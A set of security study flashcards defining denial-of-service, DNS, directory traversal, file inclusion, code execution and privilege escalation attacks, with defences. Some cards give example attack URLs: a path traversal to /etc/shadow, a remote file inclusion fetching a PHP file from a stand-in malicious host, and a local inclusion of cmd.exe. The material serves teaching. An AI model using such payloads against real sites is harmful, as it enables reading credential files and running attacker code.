Malicious activity Flashcards
What are a few Denial of Service attacks?
- SYN flood
- Amplified DNS attack
- Ping flood
- PDoS (Permanent Denial of Service)
- Fork bomb - in this attack, a process repeatedly replicates itself into multiple processes in memory, consuming all of the system's memory resources until it crashes. Here, "fork" refers to a process spawning a copy of itself.
- DDoS (Distributed Denial of Service) attack
What are a few prevention measures against DDoS attacks?
- Implement an IPS (Intrusion Prevention System)
- Black-hole/sinkhole routing
- Elastic cloud infrastructure
What is a DNS cache poisoning attack?
In this attack, a threat actor inserts malicious DNS entries (domains pointing to malicious IPs) into a DNS resolver's cache.
Protection techniques -
- Use DNSSEC (DNS Security Extensions) - with DNSSEC, the DNS responses that a resolver receives from other DNS servers carry cryptographic signatures, so the resolver can verify that they are authentic.
- Implement good security measures to protect the DNS resolver itself.
What is a DNS amplification attack?
In this attack, an attacker spoofs the victim's IP address as the source and sends queries to a DNS server requesting data.
The DNS server/resolver responds to the victim with a large amount of DNS data, which overwhelms the victim's device.
What is a DNS tunnelling attack?
In this attack, an attacker wraps the data of some other protocol, such as HTTP or SSH, inside DNS traffic in order to get through firewall rules.
They might do this to exfiltrate data or for command and control.
To protect against it, analyze DNS log data.
What is a domain hijacking attack?
It is an attack in which an attacker takes over someone else's domain.
They might do this to deface the domain or to infect users who visit the site.
To protect against it, we should protect the domain registration account information.
What is a DNS zone transfer attack?
In this attack, a threat actor mimics an authorized system to request and obtain the entire DNS zone data for a domain.
This kind of attack can expose sensitive information about a network, such as its architecture.
What is a directory traversal attack?
In this attack, a threat actor is able to access unauthorized files, folders, or commands, either inside the web document root directory or in some other folder on the same server that hosts the web document root.
Here is an example of directory traversal -
https://diontraining.com/../../../etc/shadow
What is an inclusion attack?
In this attack, a threat actor is able to include a file in an application and eventually get the application to run this malicious file.
Example - a threat actor might include a file in a web application and have this malicious file run on the server, which might lead to data theft, unexpected actions on the server, or execution of arbitrary code on the server.
It is of 2 types -
- Remote file inclusion
- Local file inclusion
What is a remote file inclusion attack?
In this attack, a threat actor finds a file inclusion vulnerability in an application and is able to include a remote file in the application (most often a web application).
Once the file is included, the web server application might run this malicious file.
Example -
https://diontraining.com/login.php?user=http://malware.bad/malicious.php
What is local file inclusion?
In this malicious activity or attack, a threat actor tries to include a file that already exists on the server host.
How can a file already exist on the web server?
- the website might have an online form that accepts file uploads, and the attacker might have used it to upload a malicious file to the server host.
So in this attack, a threat actor attempts to make the web server application run this locally included file.
Normally this involves directory traversal -
Example -
https://diontraining.com/login.php?user=../../windows/system32/cmd.exe%00
What is an arbitrary code execution attack?
This attack takes place when an attacker is able to run malicious code or commands of their own choosing on the target system.
How does an attacker do it?
They exploit some vulnerability in the web application, system, or network, such as a buffer overflow, injection attacks, file inclusion attacks, etc.
If this malicious code is executed remotely, it is known as remote arbitrary code execution.
What is a privilege escalation attack?
This is an attack in which an attacker is able to escalate their privileges on a system resource. Example - gaining write permission where they previously had only read permission.
2 types -
- Vertical privilege escalation - e.g. increasing permission level from a user account to an admin account.
- Horizontal privilege escalation - e.g. switching from the first account's permissions to a second account's, where both are user accounts but the second account has access to a certain file or resource on the system.
What are the 2 main kinds of rootkits?
- Kernel-level rootkit
- User-mode rootkit
How can we protect against file inclusion attacks?
- Sanitize user input
- Perform user input validation
- Implement proper access controls for every account, including the web service account (the account used for accessing the web server)